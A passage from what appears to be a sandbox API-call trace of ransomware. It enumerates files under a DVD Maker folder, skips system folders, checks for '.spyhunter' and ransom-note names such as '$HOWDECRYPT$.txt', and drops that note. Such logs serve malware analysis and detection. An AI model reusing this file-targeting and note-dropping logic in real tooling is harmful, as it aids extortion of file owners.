Flags=0x8, Ptr=0x2c310e0, Size=0x15d8) returned 0x2c310e0 [0092.434] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.434] lstrcmpiW (lpString1="flower_trans_MATTE_PAL.wmv", lpString2="Windows") returned -1 [0092.434] lstrlenW (lpString="Windows") returned 7 [0092.435] lstrcmpiW (lpString1="flower_trans_MATTE_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.435] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.435] lstrcmpiW (lpString1="flower_trans_MATTE_PAL.wmv", lpString2="System Volume Information") returned -1 [0092.435] lstrlenW (lpString="System Volume Information") returned 25 [0092.435] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv") returned 83 [0092.435] StrStrIW (lpFirst="flower_trans_MATTE_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.435] lstrcmpW (lpString1="flower_trans_MATTE_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.435] lstrcmpW (lpString1="flower_trans_MATTE_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.435] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv") returned 83 [0092.435] GetProcessHeap () returned 0x2c0000 [0092.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x34f7d8 [0092.435] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e0) returned 0x2c310e0 [0092.440] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.440] lstrcmpiW (lpString1="flower_trans_rgb.wmv", lpString2="Windows") returned -1 [0092.440] lstrlenW (lpString="Windows") returned 7 [0092.440] lstrcmpiW (lpString1="flower_trans_rgb.wmv", lpString2="$Recycle.bin") returned 1 [0092.440] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.440] lstrcmpiW (lpString1="flower_trans_rgb.wmv", lpString2="System Volume Information") returned -1 [0092.440] lstrlenW (lpString="System Volume Information") returned 25 [0092.440] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv") returned 77 [0092.440] StrStrIW (lpFirst="flower_trans_rgb.wmv", lpSrch=".spyhunter") returned 0x0 [0092.440] lstrcmpW (lpString1="flower_trans_rgb.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.440] lstrcmpW (lpString1="flower_trans_rgb.wmv", lpString2="_uninstalling_.png") returned 1 [0092.440] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv") returned 77 [0092.440] GetProcessHeap () returned 0x2c0000 [0092.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x378730 [0092.441] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e8) returned 0x2c310e0 [0092.441] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.441] lstrcmpiW (lpString1="flower_trans_RGB_PAL.wmv", lpString2="Windows") returned -1 [0092.441] lstrlenW (lpString="Windows") returned 7 [0092.441] lstrcmpiW (lpString1="flower_trans_RGB_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.441] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.441] lstrcmpiW (lpString1="flower_trans_RGB_PAL.wmv", lpString2="System Volume Information") returned -1 [0092.441] lstrlenW (lpString="System Volume Information") returned 25 [0092.441] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv") returned 81 [0092.441] StrStrIW (lpFirst="flower_trans_RGB_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.441] lstrcmpW (lpString1="flower_trans_RGB_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.441] lstrcmpW (lpString1="flower_trans_RGB_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.441] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv") returned 81 [0092.441] GetProcessHeap () returned 0x2c0000 [0092.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f8c8 [0092.441] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f0) returned 0x2c310e0 [0092.441] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.441] lstrcmpiW (lpString1="highlight.png", lpString2="Windows") returned -1 [0092.441] lstrlenW (lpString="Windows") returned 7 [0092.441] lstrcmpiW (lpString1="highlight.png", lpString2="$Recycle.bin") returned 1 [0092.441] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.441] lstrcmpiW (lpString1="highlight.png", lpString2="System Volume Information") returned -1 [0092.441] lstrlenW (lpString="System Volume Information") returned 25 [0092.442] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png") returned 70 [0092.442] StrStrIW (lpFirst="highlight.png", lpSrch=".spyhunter") returned 0x0 [0092.442] lstrcmpW (lpString1="highlight.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.442] lstrcmpW (lpString1="highlight.png", lpString2="_uninstalling_.png") returned 1 [0092.442] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png") returned 70 [0092.442] GetProcessHeap () returned 0x2c0000 [0092.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37e638 [0092.442] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f8) returned 0x2c310e0 [0092.442] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.442] lstrcmpiW (lpString1="mainimage-mask.png", lpString2="Windows") returned -1 [0092.442] lstrlenW (lpString="Windows") returned 7 [0092.442] lstrcmpiW (lpString1="mainimage-mask.png", lpString2="$Recycle.bin") returned 1 [0092.442] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.442] lstrcmpiW (lpString1="mainimage-mask.png", lpString2="System Volume Information") returned -1 [0092.442] lstrlenW (lpString="System Volume Information") returned 25 [0092.442] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png") returned 75 [0092.442] StrStrIW (lpFirst="mainimage-mask.png", lpSrch=".spyhunter") returned 0x0 [0092.442] lstrcmpW (lpString1="mainimage-mask.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.442] lstrcmpW (lpString1="mainimage-mask.png", lpString2="_uninstalling_.png") returned 1 [0092.442] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png") returned 75 [0092.442] GetProcessHeap () returned 0x2c0000 [0092.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346c68 [0092.442] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1600) returned 0x2c310e0 [0092.443] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.443] lstrcmpiW (lpString1="notes-static.png", lpString2="Windows") returned -1 [0092.443] lstrlenW (lpString="Windows") returned 7 [0092.443] lstrcmpiW (lpString1="notes-static.png", lpString2="$Recycle.bin") returned 1 [0092.443] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.443] lstrcmpiW (lpString1="notes-static.png", lpString2="System Volume Information") returned -1 [0092.443] lstrlenW (lpString="System Volume Information") returned 25 [0092.443] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png") returned 73 [0092.443] StrStrIW (lpFirst="notes-static.png", lpSrch=".spyhunter") returned 0x0 [0092.443] lstrcmpW (lpString1="notes-static.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.443] lstrcmpW (lpString1="notes-static.png", lpString2="_uninstalling_.png") returned 1 [0092.443] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png") returned 73 [0092.443] GetProcessHeap () returned 0x2c0000 [0092.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x346728 [0092.443] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1608) returned 0x2c310e0 [0092.443] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.443] lstrcmpiW (lpString1="play-static.png", lpString2="Windows") returned -1 [0092.443] lstrlenW (lpString="Windows") returned 7 [0092.443] lstrcmpiW (lpString1="play-static.png", lpString2="$Recycle.bin") returned 1 [0092.443] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.443] lstrcmpiW (lpString1="play-static.png", lpString2="System Volume Information") returned -1 [0092.443] lstrlenW (lpString="System Volume Information") returned 25 [0092.444] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 72 [0092.444] StrStrIW (lpFirst="play-static.png", lpSrch=".spyhunter") returned 0x0 [0092.444] lstrcmpW (lpString1="play-static.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.444] lstrcmpW (lpString1="play-static.png", lpString2="_uninstalling_.png") returned 1 [0092.444] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 72 [0092.444] GetProcessHeap () returned 0x2c0000 [0092.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x346d48 [0092.444] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1610) returned 0x2c310e0 [0092.444] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0092.444] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0092.445] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\$HOWDECRYPT$.txt") returned 73 [0092.445] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\$HOWDECRYPT$.txt") returned 73 [0092.445] GetProcessHeap () returned 0x2c0000 [0092.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x346648 [0092.445] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1618) returned 0x2c310e0 [0092.446] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.446] lstrcmpiW (lpString1="BlackRectangle.bmp", lpString2="Windows") returned -1 [0092.446] lstrlenW (lpString="Windows") returned 7 [0092.446] lstrcmpiW (lpString1="BlackRectangle.bmp", lpString2="$Recycle.bin") returned 1 [0092.446] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.446] lstrcmpiW (lpString1="BlackRectangle.bmp", lpString2="System Volume Information") returned -1 [0092.446] lstrlenW (lpString="System Volume Information") returned 25 [0092.446] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned 66 [0092.446] StrStrIW (lpFirst="BlackRectangle.bmp", lpSrch=".spyhunter") returned 0x0 [0092.446] lstrcmpW (lpString1="BlackRectangle.bmp", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.446] lstrcmpW (lpString1="BlackRectangle.bmp", lpString2="_uninstalling_.png") returned 1 [0092.446] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned 66 [0092.447] GetProcessHeap () returned 0x2c0000 [0092.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x358d60 [0092.447] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1620) returned 0x2c310e0 [0092.447] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.447] lstrcmpiW (lpString1="circleround_glass.png", lpString2="Windows") returned -1 [0092.447] lstrlenW (lpString="Windows") returned 7 [0092.447] lstrcmpiW (lpString1="circleround_glass.png", lpString2="$Recycle.bin") returned 1 [0092.447] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.447] lstrcmpiW (lpString1="circleround_glass.png", lpString2="System Volume Information") returned -1 [0092.447] lstrlenW (lpString="System Volume Information") returned 25 [0092.447] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png") returned 69 [0092.447] StrStrIW (lpFirst="circleround_glass.png", lpSrch=".spyhunter") returned 0x0 [0092.447] lstrcmpW (lpString1="circleround_glass.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.447] lstrcmpW (lpString1="circleround_glass.png", lpString2="_uninstalling_.png") returned 1 [0092.447] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png") returned 69 [0092.447] GetProcessHeap () returned 0x2c0000 [0092.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37e710 [0092.447] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1628) returned 0x2c310e0 [0092.447] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.447] lstrcmpiW (lpString1="circleround_selectionsubpicture.png", lpString2="Windows") returned -1 [0092.447] lstrlenW (lpString="Windows") returned 7 [0092.447] lstrcmpiW (lpString1="circleround_selectionsubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.447] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.448] lstrcmpiW (lpString1="circleround_selectionsubpicture.png", lpString2="System Volume Information") returned -1 [0092.448] lstrlenW (lpString="System Volume Information") returned 25 [0092.448] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png") returned 83 [0092.448] StrStrIW (lpFirst="circleround_selectionsubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.448] lstrcmpW (lpString1="circleround_selectionsubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.448] lstrcmpW (lpString1="circleround_selectionsubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.448] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png") returned 83 [0092.448] GetProcessHeap () returned 0x2c0000 [0092.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x34f9b8 [0092.448] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1630) returned 0x2c310e0 [0092.448] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.448] lstrcmpiW (lpString1="circleround_videoinset.png", lpString2="Windows") returned -1 [0092.448] lstrlenW (lpString="Windows") returned 7 [0092.448] lstrcmpiW (lpString1="circleround_videoinset.png", lpString2="$Recycle.bin") returned 1 [0092.448] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.448] lstrcmpiW (lpString1="circleround_videoinset.png", lpString2="System Volume Information") returned -1 [0092.448] lstrlenW (lpString="System Volume Information") returned 25 [0092.448] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png") returned 74 [0092.448] StrStrIW (lpFirst="circleround_videoinset.png", lpSrch=".spyhunter") returned 0x0 [0092.448] lstrcmpW (lpString1="circleround_videoinset.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.448] lstrcmpW (lpString1="circleround_videoinset.png", lpString2="_uninstalling_.png") returned 1 [0092.448] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png") returned 74 [0092.448] GetProcessHeap () returned 0x2c0000 [0092.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346808 [0092.449] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1638) returned 0x2c310e0 [0092.449] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.449] lstrcmpiW (lpString1="Circle_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.449] lstrlenW (lpString="Windows") returned 7 [0092.449] lstrcmpiW (lpString1="Circle_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.449] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.449] lstrcmpiW (lpString1="Circle_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.449] lstrlenW (lpString="System Volume Information") returned 25 [0092.449] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png") returned 72 [0092.449] StrStrIW (lpFirst="Circle_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.449] lstrcmpW (lpString1="Circle_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.449] lstrcmpW (lpString1="Circle_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.449] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png") returned 72 [0092.449] GetProcessHeap () returned 0x2c0000 [0092.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x346568 [0092.449] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1640) returned 0x2c310e0 [0092.449] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.449] lstrcmpiW (lpString1="circle_glass_Thumbnail.bmp", lpString2="Windows") returned -1 [0092.449] lstrlenW (lpString="Windows") returned 7 [0092.449] lstrcmpiW (lpString1="circle_glass_Thumbnail.bmp", lpString2="$Recycle.bin") returned 1 [0092.449] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.449] lstrcmpiW (lpString1="circle_glass_Thumbnail.bmp", lpString2="System Volume Information") returned -1 [0092.449] lstrlenW (lpString="System Volume Information") returned 25 [0092.450] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp") returned 74 [0092.450] StrStrIW (lpFirst="circle_glass_Thumbnail.bmp", lpSrch=".spyhunter") returned 0x0 [0092.450] lstrcmpW (lpString1="circle_glass_Thumbnail.bmp", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.450] lstrcmpW (lpString1="circle_glass_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0092.450] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp") returned 74 [0092.450] GetProcessHeap () returned 0x2c0000 [0092.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346e28 [0092.450] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1648) returned 0x2c310e0 [0092.450] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.450] lstrcmpiW (lpString1="Circle_SelectionSubpictureA.png", lpString2="Windows") returned -1 [0092.450] lstrlenW (lpString="Windows") returned 7 [0092.450] lstrcmpiW (lpString1="Circle_SelectionSubpictureA.png", lpString2="$Recycle.bin") returned 1 [0092.450] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.450] lstrcmpiW (lpString1="Circle_SelectionSubpictureA.png", lpString2="System Volume Information") returned -1 [0092.450] lstrlenW (lpString="System Volume Information") returned 25 [0092.450] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png") returned 79 [0092.450] StrStrIW (lpFirst="Circle_SelectionSubpictureA.png", lpSrch=".spyhunter") returned 0x0 [0092.450] lstrcmpW (lpString1="Circle_SelectionSubpictureA.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.450] lstrcmpW (lpString1="Circle_SelectionSubpictureA.png", lpString2="_uninstalling_.png") returned 1 [0092.450] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png") returned 79 [0092.450] GetProcessHeap () returned 0x2c0000 [0092.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x378818 [0092.450] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1650) returned 0x2c310e0 [0092.450] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.451] lstrcmpiW (lpString1="Circle_SelectionSubpictureB.png", lpString2="Windows") returned -1 [0092.451] lstrlenW (lpString="Windows") returned 7 [0092.451] lstrcmpiW (lpString1="Circle_SelectionSubpictureB.png", lpString2="$Recycle.bin") returned 1 [0092.451] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.451] lstrcmpiW (lpString1="Circle_SelectionSubpictureB.png", lpString2="System Volume Information") returned -1 [0092.451] lstrlenW (lpString="System Volume Information") returned 25 [0092.451] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png") returned 79 [0092.451] StrStrIW (lpFirst="Circle_SelectionSubpictureB.png", lpSrch=".spyhunter") returned 0x0 [0092.451] lstrcmpW (lpString1="Circle_SelectionSubpictureB.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.451] lstrcmpW (lpString1="Circle_SelectionSubpictureB.png", lpString2="_uninstalling_.png") returned 1 [0092.451] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureB.png") returned 79 [0092.451] GetProcessHeap () returned 0x2c0000 [0092.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x349850 [0092.451] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1658) returned 0x2c310e0 [0092.451] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.451] lstrcmpiW (lpString1="Circle_VideoInset.png", lpString2="Windows") returned -1 [0092.451] lstrlenW (lpString="Windows") returned 7 [0092.452] lstrcmpiW (lpString1="Circle_VideoInset.png", lpString2="$Recycle.bin") returned 1 [0092.452] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.452] lstrcmpiW (lpString1="Circle_VideoInset.png", lpString2="System Volume Information") returned -1 [0092.452] lstrlenW (lpString="System Volume Information") returned 25 [0092.452] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png") returned 69 [0092.452] StrStrIW (lpFirst="Circle_VideoInset.png", lpSrch=".spyhunter") returned 0x0 [0092.452] lstrcmpW (lpString1="Circle_VideoInset.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.452] lstrcmpW (lpString1="Circle_VideoInset.png", lpString2="_uninstalling_.png") returned 1 [0092.452] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png") returned 69 [0092.452] GetProcessHeap () returned 0x2c0000 [0092.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37e488 [0092.452] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1660) returned 0x2c310e0 [0092.456] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.456] lstrcmpiW (lpString1="cloud_Thumbnail.bmp", lpString2="Windows") returned -1 [0092.456] lstrlenW (lpString="Windows") returned 7 [0092.456] lstrcmpiW (lpString1="cloud_Thumbnail.bmp", lpString2="$Recycle.bin") returned 1 [0092.456] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.456] lstrcmpiW (lpString1="cloud_Thumbnail.bmp", lpString2="System Volume Information") returned -1 [0092.456] lstrlenW (lpString="System Volume Information") returned 25 [0092.456] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp") returned 67 [0092.456] StrStrIW (lpFirst="cloud_Thumbnail.bmp", lpSrch=".spyhunter") returned 0x0 [0092.456] lstrcmpW (lpString1="cloud_Thumbnail.bmp", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.456] lstrcmpW (lpString1="cloud_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0092.456] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp") returned 67 [0092.457] GetProcessHeap () returned 0x2c0000 [0092.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358610 [0092.457] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1668) returned 0x2c310e0 [0092.457] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.457] lstrcmpiW (lpString1="Dot.png", lpString2="Windows") returned -1 [0092.457] lstrlenW (lpString="Windows") returned 7 [0092.457] lstrcmpiW (lpString1="Dot.png", lpString2="$Recycle.bin") returned 1 [0092.457] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.457] lstrcmpiW (lpString1="Dot.png", lpString2="System Volume Information") returned -1 [0092.457] lstrlenW (lpString="System Volume Information") returned 25 [0092.457] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png") returned 55 [0092.457] StrStrIW (lpFirst="Dot.png", lpSrch=".spyhunter") returned 0x0 [0092.457] lstrcmpW (lpString1="Dot.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.457] lstrcmpW (lpString1="Dot.png", lpString2="_uninstalling_.png") returned 1 [0092.457] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Dot.png") returned 55 [0092.457] GetProcessHeap () returned 0x2c0000 [0092.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xb0) returned 0x329dd8 [0092.457] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1670) returned 0x2c310e0 [0092.457] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 